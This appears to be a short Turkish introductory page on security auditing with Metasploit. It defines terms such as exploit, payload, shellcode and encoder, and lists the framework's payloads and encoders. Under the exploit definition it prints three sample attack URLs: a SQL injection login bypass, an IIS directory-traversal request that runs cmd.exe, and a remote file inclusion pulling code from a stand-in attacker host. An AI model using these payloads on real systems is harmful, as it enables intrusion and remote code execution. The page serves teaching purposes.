Metasploit Ile Güvenlik Denetimi

Metasploit ile Güvenlik Denetimi

Terimler:

Exploit : Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem.

http://sunucu/script/login.asp?uid=’ OR 1=1–

http://sunucu/script/..%c0%af../winnt/system32/cmd.exe?/c+dir

http://sunucu/script/index.php?dizin=http://saldırgan.com/kotukod.txt?

Payload : Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik.
Shellcode:Exploit sonrasi çalisicak olan sisteme özel kodlar.
Nop : “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler..
Encoder : Çalışacak olan Shellcode’u değiştiren ve IDS/IPS ler tarafından yakalanmasını önleyen yazılımlar.

Exploit Türleri :
Local Exploits : Lokal Exploitler yerel bilgisayarda yüklü olan yazilimlarin zayifliklarini exploit eder.
Remote Exploits : Remote exploit internet üzerinden çalismakta ve uzaktaki sistem ile bir bagimizin olmadigi, kendi bilgisayarimizdan derlenerek sisteme erisim saglayabilmemiz için kodlanmis exploitlerdir.

Exploitlerin Genel Özellikleri ;
-Çok farkli programla dillerinde gelistirilmis olabilir
(binary ,c ,c++ ,perl ,python ,php ,html)
-Exploit kodu açik herkez tarafindan kullaniliyor olabilir.
-Herkez tarafindan kullanildigi icin yamasi (pach) yapilmis önlem alinmis olabilir.
-Kod kötü islere hizmet icin yazilmis olabilir.

Metasploit Framework
-2.x (GPL/Artistic) ve 3.x olarak farklı iki sürümü bulunmakta.
-158+ exploit ve 76+ payload bulunuyor.
-Çok farkli turde payload’lar kullanilabiliyor
>Meterpreter
>VNC DLL Injection
>Binary Upload
>PassiveX
-Çok sayida farkli encoder kullanilabiliyor
>alpha2, Pex, Shikata Ga Nai, Sparc, Countdown,JpmCallAdditive
-Konsol, web arabirimi bulunuyor